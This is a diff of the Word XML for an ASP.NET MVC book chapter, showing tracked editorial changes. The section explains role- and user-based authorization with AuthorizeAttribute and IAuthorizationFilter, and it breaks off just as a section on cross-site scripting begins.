         <w:t xml:space="preserve"> requires. These roles or users are passed to the attribute using a comma-delimited list of strings - either the usernames or the roles allowed. Listing 11.2 shows the </w:t>
       </w:r>
-      <w:commentRangeStart w:id="5"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
@@ -412,629 +458,764 @@
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> syntax for requiring a specific user.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.2 User authorization with the AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[Authorize(Users = "admin")]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public ActionResult Admins()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return View();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 Users property requires specific users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Hard</w:t>
+      </w:r>
+      <w:ins w:id="9" w:author="JSkinner" w:date="2010-03-02T18:39:00Z">
+        <w:r>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">coding a username like this may be too tightly controlling.  Users come and go and the duties of a given user may change during their time using the application.  Instead of requiring a specific user it usually makes sense to require a role.  Listing 11.3 demonstrates how </w:t>
+      </w:r>
+      <w:del w:id="10" w:author="JSkinner" w:date="2010-03-02T18:40:00Z">
+        <w:r>
+          <w:delText xml:space="preserve">develoeprs </w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="11" w:author="JSkinner" w:date="2010-03-02T18:40:00Z">
+        <w:r>
+          <w:t xml:space="preserve">developers </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">can use the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+          <w:rPrChange w:id="12" w:author="JSkinner" w:date="2010-03-02T18:40:00Z">
+            <w:rPr>
+              <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+              <w:color w:val="auto"/>
+              <w:sz w:val="18"/>
+              <w:szCs w:val="20"/>
+            </w:rPr>
+          </w:rPrChange>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to restrict an action to certain roles.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.3 Role authorization with the AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[Authorize(Roles = "admins, developers")]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public ActionResult Developers()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return View();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 Multiple roles are comma delimited</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:ins w:id="13" w:author="JSkinner" w:date="2010-03-02T18:40:00Z">
+        <w:r>
+          <w:lastRenderedPageBreak/>
+          <w:t xml:space="preserve">Access to </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="14" w:author="JSkinner" w:date="2010-03-02T18:40:00Z">
+        <w:r>
+          <w:delText>T</w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="15" w:author="JSkinner" w:date="2010-03-02T18:40:00Z">
+        <w:r>
+          <w:t>t</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">he </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Developers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> action will only be allowed to users in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>admins</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>developers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> roles - all other users (authenticated or not) will be issued a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>401</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> response code and using ASP.NET's forms authentication, redirected to the login page. Now that we've seen a few examples of how the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is used, let's talk about how it works.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.1.3 AuthorizeAttribute - how it works</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> checks the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IPrincipal</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> associated with the current </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>HttpContext</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. When </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Users</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Roles</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is specified, it ensures the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IPrincipal</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'s username is in the allowed usernames, or a member of one of the granted roles.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is applied to a controller, it is applied to every action in that controller.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If multiple </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthrorizeAttributes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> are applied to an action, all checks occur and the user must be authorized by all of them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> implements a special interface called </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  When applied to an action,</w:t>
+      </w:r>
+      <w:ins w:id="16" w:author="JSkinner" w:date="2010-03-02T18:41:00Z">
+        <w:r>
+          <w:t xml:space="preserve"> an</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+          <w:rPrChange w:id="17" w:author="JSkinner" w:date="2010-03-02T18:41:00Z">
+            <w:rPr>
+              <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+              <w:color w:val="auto"/>
+              <w:sz w:val="18"/>
+              <w:szCs w:val="20"/>
+            </w:rPr>
+          </w:rPrChange>
+        </w:rPr>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> will execute before any other action filters, and of course before the normal result. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.4 shows the declaration of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.4 IAuthorizationFilter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public interface IAuthorizationFilter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>void OnAuthorization(AuthorizationContext filterContext);</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If you wanted to create your own filter attribute for authentication or authorization, you could implement this interface as an action filter and apply it to an action. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:commentRangeStart w:id="18"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="18"/>
+      <w:r>
+        <w:commentReference w:id="18"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> does its security check in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>OnAuthorization</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> method (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, and sets the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizationContext</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">'s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Result</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> property to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>HttpUnauthorizedResult</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - the mechanism for returning that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>401</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> status code</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">There are several other </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IAuthenticationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> implementations in ASP.NET MVC; all are used to short-circuit the normal response to protect against undesired requests.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  Chapter 9 covered filters, and these five filters deal specifically with security.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>ChildActionOnlyAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>RequireHttpsAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>ValidateInputAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">We've seen how </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> can help us manage authentication and authorization, now let's turn our attention to other</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, more insidious</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> att</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ack vectors. While authentication and authorization checks prevent hapless visitors from accessing secure </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>areas, we still must protect our application from hackers and thieves who attempt to exploit vulnerabilities inherent in web applications.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.2 C</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ross-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Site Scripting (XSS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cross-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">site scripting </w:t>
+      </w:r>
+      <w:r>
+        <w:t>is a technique where a malicious user manipulates the system so that special JavaScript appears on the vuln</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">erable </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="19"/>
+      <w:commentRangeStart w:id="20"/>
+      <w:r>
+        <w:t>w</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ebsite </w:t>
+      </w:r>
+      <w:del w:id="21" w:author="JSkinner" w:date="2010-03-02T18:31:00Z">
+        <w:r>
+          <w:delText xml:space="preserve">-- </w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="22" w:author="JSkinner" w:date="2010-03-02T18:31:00Z">
+        <w:r>
+          <w:t xml:space="preserve">— </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="19"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="5"/>
-      </w:r>
-      <w:r>
-        <w:t>syntax for requiring a specific user.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.2 User authorization with the AuthorizeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[Authorize(Users = "admin")]</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public ActionResult Admins()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>return View();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#1 Users property requires specific users</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Hardcoding a username like this may be too tightly controlling.  Users come and go and the duties of a given user may change during their time using the application.  Instead of requiring a specific user it usually makes sense to require a role.  Listing 11.3 demonstrates how develoeprs can use the AuthorizeAttribute to restrict an action to certain roles.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.3 Role authorization with the AuthorizeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[Authorize(Roles = "admins, developers")]</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public ActionResult Developers()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>return View();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#1 Multiple roles are comma delimited</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Developers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> action will only be allowed to users in the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>admins</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>developers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> roles - all other users (authenticated or not) will be issued a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>401</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> response code and using ASP.NET's forms authentication, redirected to the login page. Now that we've seen a few examples of how the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is used, let's talk about how it works.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.1.3 AuthorizeAttribute - how it works</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> checks the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IPrincipal</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> associated with the current </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>HttpContext</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. When </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Users</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>Roles</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is specified, it ensures the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IPrincipal</w:t>
-      </w:r>
-      <w:r>
-        <w:t>'s username is in the allowed usernames, or a member of one of the granted roles.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is applied to a controller, it is applied to every action in that controller.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If multiple </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthrorizeAttributes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> are applied to an action, all checks occur and the user must be authorized by all of them.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> implements a special interface called </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  When applied to an action, IAuthorizationFilter will execute before any other action filters, and of course before the normal result. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.4 shows the declaration of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>IAuthorizationFilter</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.4 IAuthorizationFilter</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public interface IAuthorizationFilter</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>void OnAuthorization(AuthorizationContext filterContext);</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If you wanted to create your own filter attribute for authentication or authorization, you could implement this interface as an action filter and apply it to an action. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> does its security check in the </w:t>
-      </w:r>
-      <w:r>
